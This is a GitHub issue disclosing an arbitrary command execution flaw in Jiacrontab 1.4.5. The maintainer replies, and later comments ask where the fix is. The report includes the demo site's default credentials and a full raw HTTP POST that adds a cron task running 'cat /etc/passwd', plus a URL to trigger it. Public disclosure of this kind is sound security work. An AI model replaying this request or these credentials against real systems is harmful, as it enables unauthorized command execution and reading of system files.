Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jiacrontab 1.4.5 arbitrary code execution vulnerability #28

Closed
GhostStar opened this issue Dec 2, 2018 · 3 comments
Closed

Jiacrontab 1.4.5 arbitrary code execution vulnerability #28

GhostStar opened this issue Dec 2, 2018 · 3 comments

Comments

@GhostStar
Copy link

Test in the demo: http://jiacrontab.iwannay.cn/
User: admin Password: 123456

1.Log in

2.Add task
test1
Modify the values of command and args, Read the passwd file.

command=cat&args=/etc/passwd

POST https://jiacrontab.iwannay.cn/crontab/task/edit?addr=localhost%3a20001 HTTP/1.1
Host: jiacrontab.iwannay.cn
Connection: keep-alive
Content-Length: 192
Cache-Control: max-age=0
Origin: https://jiacrontab.iwannay.cn
Upgrade-Insecure-Requests: 1
DNT: 1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Referer: https://jiacrontab.iwannay.cn/crontab/task/edit?addr=localhost%3a20001
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9,ja;q=0.8,zh-TW;q=0.7
Cookie: access_token=

taskId=0&taskName=test&command=cat&args=/etc/passwd&execType=0&timeout=0&optimeout=kill&mailTo=jiacontab%40yopmail.com&apiTo=&maxConcurrent=1&minute=*&hour=*&day=*&month=*&weekday=*&sync=false

3. Successfully added and run this task
cve2
https://jiacrontab.iwannay.cn/crontab/task/quickStart?taskId=25&addr=localhost:20001

4. Get echo
cve3

@iwannay
Copy link
Owner

iwannay commented Dec 12, 2018

@GhostStar

  1. You should log in first, which will prevent untrusted users.
  2. The new version will filter unauthorized commands.
  3. Auditing mechanism will be added to future versions.

Finally, thank you very much for your reminding

@iwannay iwannay closed this as completed Dec 12, 2018
@Ofirnir123
Copy link

Hi @iwannay !
Do you have a refrence link that fix that issue ?
Kind regards!

@NicoleG25
Copy link

@iwannay please note that a CVE was assigned to this issue.
Could you please point out where the fix was made/committed?
Cheers !

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
None yet
Projects
None yet
Development

No branches or pull requests

4 participants